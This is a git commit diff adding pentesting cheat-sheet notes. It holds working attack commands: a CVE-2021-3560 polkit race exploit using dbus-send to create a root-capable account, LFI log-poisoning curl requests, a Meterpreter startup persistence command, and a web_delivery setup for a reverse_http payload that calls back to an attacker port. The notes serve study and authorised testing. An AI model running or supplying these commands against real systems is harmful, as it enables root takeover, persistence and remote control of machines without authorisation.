This commit is contained in:
Stefan Friese 2021-09-11 02:55:17 +02:00
parent 9623d1008d
commit 55970b5c82
6 changed files with 65 additions and 7 deletions

24
exploit/linux/polkit.md Normal file
View File

@ -0,0 +1,24 @@
# CVE-2021-3560
* Exploit `< 0.105-26ubuntu1.1`
## Racing Condition
* Request creation of account via dbus message and `pkexec`. sleep time is variable.
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
```
* Create password via `openssl passwd -6 -salt salt password123`
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
```
* Request is killed after polkits receives it
* Polkit requests uid of user who sent the message, which has been deleted
* Error will be thrown
* Uid turns to root afterwards
* Request succeeds
* `su user1` and `sudo -s`

View File

@ -1,6 +1,8 @@
# Local File Inclusion
To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
## Usage
* Exploit URL parameter by including other files.
@ -28,3 +30,4 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```

View File

@ -1,4 +1,11 @@
# Methodology
# Pentesting
Authorized audit of security systems of computers and networks.
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
* Permissions
* Scope
* Rules
## Methodology
* Steps
* Reconnaissance
@ -8,7 +15,7 @@
* Covering Tracks
* Reporting
## Reconnaissance
### Reconnaissance
* Duck / SearX / metacrawler / google
* Wikipedia
* [Shodan.io](http://www.shodan.io)
@ -19,7 +26,7 @@
* builtwith.com
* wappalyzer
## Enumeration
### Enumeration
* nmap
* nikto
* gobuster
@ -27,16 +34,24 @@
* metasploit
* enum4linux / linpeas / winpeas / linenum
## Exploitation
### Exploitation
## Privilege Escalation
### Post Exploitation
* Pivoting
#### Privilege Escalation
* Vertically or horizontally
## Covering Tracks
#### Covering Tracks
## Reporting
#### Reporting
* Includes
* Vulnerabilities
* Criticality
* Description
* Countermeasures
* Finding summary
## Frameworks
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
* [NIST](https://www.nist.gov/cyberframework)
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)

View File

@ -0,0 +1,6 @@
# Meterpreter Persistence
## Load shell on system startup
```sh
run persistence -X
```

View File

@ -48,3 +48,13 @@ run post/windows/gather/hashdump
load kiwi
lsa_dump_sam
```
### Webdelivery
```sh
use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
```
* Copy into powershell/cmd

BIN
reverse_shells/docs/prep Normal file

Binary file not shown.